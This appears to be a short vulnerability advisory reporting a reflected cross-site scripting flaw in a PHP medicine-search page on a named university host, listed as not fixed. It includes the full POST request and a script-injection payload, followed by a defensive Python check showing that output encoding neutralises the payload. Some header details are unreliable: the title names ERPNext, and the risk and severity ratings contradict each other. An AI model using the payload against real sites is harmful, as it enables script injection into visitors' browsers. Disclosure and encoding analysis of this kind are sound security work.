lidya hacettepe Cross Site Scripting

2020.01.07
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Name: lidya.hacettepe.edu.tr Cross-site Scripting Vulnerabilities in ERPNext
Vendor Homepage: lidya.hacettepe.edu.tr
Vulnerability Type: Reflected Cross-site Scripting
Severity: High
Status: Not Fixed
----------------------------------------------------------------------
Request Headers

POST /~ahmett10/bto316/ilac/ilaclar.php HTTP/1.1
Content-Length: 94
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=52hvvq2g6l8qu0slfojti0aub1
Host: lidya.hacettepe.edu.tr
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
----------------------------------------------------------------------
alert here =>

ara=Ara&bul=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28956925%29%3c%2fScRiPt%3e&sec=t_ilac.adi
----------------------------------------------------------------------
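The following is an added example, not part of the original advisory or the affected site's code: it decodes the posted form body from the request above and checks, with an HTML parser, whether each field would produce a script element when echoed into the response, first raw and then with output encoding applied. The `render` template is hypothetical (the source of `ilaclar.php` is not shown on the page) and assumes the value is reflected into element text.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qsl

# Form body copied from the request in the advisory above.
BODY = ("ara=Ara&bul=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28956925%29"
        "%3c%2fScRiPt%3e&sec=t_ilac.adi")

class ScriptCounter(HTMLParser):
    """Counts <script> start tags as an HTML parser sees them (case-insensitive)."""
    def __init__(self):
        super().__init__()
        self.count = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":  # HTMLParser lowercases tag names
            self.count += 1

def script_tags(fragment):
    parser = ScriptCounter()
    parser.feed(fragment)
    parser.close()
    return parser.count

# Hypothetical result page; the real template is an assumption.
def render(term, encode):
    shown = html.escape(term, quote=True) if encode else term
    return f"<p>Search results for: {shown}</p>"

def audit(body):
    """Per posted field: HTML metacharacters present, and whether reflecting the
    value into element text yields a script element with/without encoding."""
    report = {}
    for name, value in parse_qsl(body, keep_blank_values=True):
        report[name] = {
            "metachars": sorted(set(value) & set("<>&\"'")),
            "script_if_raw": script_tags(render(value, encode=False)),
            "script_if_encoded": script_tags(render(value, encode=True)),
        }
    return report

if __name__ == "__main__":
    for field, result in audit(BODY).items():
        print(field, result)
```

Only `bul` carries markup; encoding it on output leaves the same bytes visible to the user as text while the parser no longer sees a script element.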


Copyright 2022, cxsecurity.com

 
